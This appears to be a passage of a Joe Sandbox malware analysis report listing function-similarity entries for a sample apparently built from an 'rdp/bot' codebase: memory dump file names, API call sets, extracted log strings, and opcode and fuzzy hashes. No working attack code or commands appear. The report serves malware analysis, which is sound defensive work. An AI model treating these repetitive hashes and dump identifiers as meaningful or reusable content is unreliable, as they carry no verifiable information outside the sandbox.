                                                                    • Opcode Fuzzy Hash: 9602df945be126a78eb9839a344b0b067acd0e49c73a6f61a765f3d0829be5e2
                                                                    • Instruction Fuzzy Hash: 764182E6D1CE1785FB315A97E44037D265D7F04BB8F2401BADD0F4A6B0EEACA6818321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CopyErrorFileLastfflushfwrite
                                                                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                    • API String ID: 2887799713-3464183404
                                                                    • Opcode ID: 71f428511ad1387fb65e5609385e09bfa4816190db5767a95bb3a0b10491a7de
                                                                    • Instruction ID: cf35dfefdc387f12b61e3cd7a0711d1edf60e947f3367abeac9e54f1d21bc262
                                                                    • Opcode Fuzzy Hash: 71f428511ad1387fb65e5609385e09bfa4816190db5767a95bb3a0b10491a7de
                                                                    • Instruction Fuzzy Hash: EC41B455D0CE1A99FA244A87A4007BD16547F21BBCE0401B2D93F776B1EE5CEB81CB0D
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                    • API String ID: 2018770650-4119452840
                                                                    • Opcode ID: 4f32487ad11511cab57dacbea496314a160be058fe107193b659323eb624b3df
                                                                    • Instruction ID: 794db594a5160f9f35b59a513a2300a3e3daea8986e5f23894ba15679650b6e4
                                                                    • Opcode Fuzzy Hash: 4f32487ad11511cab57dacbea496314a160be058fe107193b659323eb624b3df
                                                                    • Instruction Fuzzy Hash: 93313951E0DE1B82FB319B9BE8407BD22495F50374F6900BAC91E4B2F5FD6DA9818322
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                    • API String ID: 2018770650-4119452840
                                                                    • Opcode ID: 70a665a64a522c0d3cbc215f0aa026ba96beff9f02ad04497d524d0d72159267
                                                                    • Instruction ID: 9564f6941592a55dfd508c156184715615c532ce5c49ee074297fa80b54d7703
                                                                    • Opcode Fuzzy Hash: 70a665a64a522c0d3cbc215f0aa026ba96beff9f02ad04497d524d0d72159267
                                                                    • Instruction Fuzzy Hash: 8F316D51E0CE0A8AFA24961BF5503BD62415F70374F1404B2C97E377B6ED1DAE85AB0A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                    • API String ID: 39653677-2979476222
                                                                    • Opcode ID: 28e28fe22df28801ee0245a04dc4fec4bfebef32c345413e74c9e58db5eccbf1
                                                                    • Instruction ID: 8b486283412d31494c8beb02d578355097668aeb7787ec60d846617fc6e01484
                                                                    • Opcode Fuzzy Hash: 28e28fe22df28801ee0245a04dc4fec4bfebef32c345413e74c9e58db5eccbf1
                                                                    • Instruction Fuzzy Hash: 4A51B392B0DD8359FF258A97A9107BD265A7F007E8F4840BADE4E0B6B5DF6CED458300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$H:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                    • API String ID: 39653677-2979476222
                                                                    • Opcode ID: 256b97451d981dea282954d276a58f70d48f812c3a5c18dd3d3815c3919d25ec
                                                                    • Instruction ID: 50278e5daf176919bcd136693cc0458d7f0a1541fed0cf0b4b64e47fffd164eb
                                                                    • Opcode Fuzzy Hash: 256b97451d981dea282954d276a58f70d48f812c3a5c18dd3d3815c3919d25ec
                                                                    • Instruction Fuzzy Hash: 9851D291A0CD8B89FA598A17F9107BD16517B317A8F4442B2DD2E372F2DE2DE5068308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
                                                                    • String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
                                                                    • API String ID: 2011334650-1527096901
                                                                    • Opcode ID: 66a3f05f77845ceec4428f1e402f2588408590e07ecc7afb8576188049664c55
                                                                    • Instruction ID: 77c20318b7fae06b4b482b9961853383eea561d582263ea0a29f9862187c63cf
                                                                    • Opcode Fuzzy Hash: 66a3f05f77845ceec4428f1e402f2588408590e07ecc7afb8576188049664c55
                                                                    • Instruction Fuzzy Hash: 92213161A0AE0794FF12AB97E84417C63ADAF44BB0F4845BDD91E473B8EE6CE845C301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
                                                                    • String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
                                                                    • API String ID: 2011334650-1527096901
                                                                    • Opcode ID: 49b1fd760a10f2870a0ec3ca0901205ba1fa7ca952bd0aef191dbdd6cb4fa325
                                                                    • Instruction ID: 300fb7353b603a8770afbd059144baf5420ffc08461a7efa619d9810ddc22410
                                                                    • Opcode Fuzzy Hash: 49b1fd760a10f2870a0ec3ca0901205ba1fa7ca952bd0aef191dbdd6cb4fa325
                                                                    • Instruction Fuzzy Hash: D8213DA1F0EB0791FE716F56E99017823A0EF48B84F08A435C9CD477B4EE6CE4858B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
                                                                    • Instruction ID: 07085e79bf24454f7a713d60d2c87b5743a9d2102e1bb07336a270110f50b74d
                                                                    • Opcode Fuzzy Hash: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
                                                                    • Instruction Fuzzy Hash: 41218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
                                                                    • Instruction ID: 15fa7c26fad84f45c3c62a04697b34d12fc1c1562d6855751f06cad6b83275b7
                                                                    • Opcode Fuzzy Hash: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
                                                                    • Instruction Fuzzy Hash: 79218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D43B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
                                                                    • Instruction ID: 4d5ca3f23a66fa9546efd7f49c57e323a2c777323c6adc96ba3f6dfe32290c0a
                                                                    • Opcode Fuzzy Hash: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
                                                                    • Instruction Fuzzy Hash: 93218E29B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
                                                                    • Instruction ID: 15fa7c26fad84f45c3c62a04697b34d12fc1c1562d6855751f06cad6b83275b7
                                                                    • Opcode Fuzzy Hash: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
                                                                    • Instruction Fuzzy Hash: 79218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D43B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: b7bf14e9f57a41d237414f1780024f26c93874e31421226ccd5b17d666592d17
                                                                    • Instruction ID: f70b74c4e9d29863eee52f7c69cfd3aea273a60b30f3512b32e10aaa6dacc12e
                                                                    • Opcode Fuzzy Hash: b7bf14e9f57a41d237414f1780024f26c93874e31421226ccd5b17d666592d17
                                                                    • Instruction Fuzzy Hash: 9A218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
                                                                    • Instruction ID: 4d5ca3f23a66fa9546efd7f49c57e323a2c777323c6adc96ba3f6dfe32290c0a
                                                                    • Opcode Fuzzy Hash: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
                                                                    • Instruction Fuzzy Hash: 93218E29B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
                                                                    • String ID:
                                                                    • API String ID: 425989387-0
                                                                    • Opcode ID: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
                                                                    • Instruction ID: 07085e79bf24454f7a713d60d2c87b5743a9d2102e1bb07336a270110f50b74d
                                                                    • Opcode Fuzzy Hash: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
                                                                    • Instruction Fuzzy Hash: 41218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcat
                                                                    • String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                                    • API String ID: 2335785903-657390819
                                                                    • Opcode ID: 0fd57004b371df1984a92abffd1b094a4eb68b8aa7461c929641d995ba0cbeb6
                                                                    • Instruction ID: b68b41c2cf5e4420632116f6ec2b193294cc78993ae98c13acb6987845e16768
                                                                    • Opcode Fuzzy Hash: 0fd57004b371df1984a92abffd1b094a4eb68b8aa7461c929641d995ba0cbeb6
                                                                    • Instruction Fuzzy Hash: FE11D0A1E08E4784FB125F67AD00BBD669A5F21BE8F4C80B0DE4D0A3B6DE2CE4518340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$strcat
                                                                    • String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                                    • API String ID: 2335785903-657390819
                                                                    • Opcode ID: ae4effbd7a291b0ed4bc95fb94177f23ec76591f18c63d0d9a1729a6dee433f2
                                                                    • Instruction ID: a805137eb5df3b7c06b20c9ef4dbdb42d5f4991b781b5518c05da595620aa120
                                                                    • Opcode Fuzzy Hash: ae4effbd7a291b0ed4bc95fb94177f23ec76591f18c63d0d9a1729a6dee433f2
                                                                    • Instruction Fuzzy Hash: 5711B461A0CE838CFA159B1799147BD56519F317B4F5C40B0DE6D2B2ABDE3D94109308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
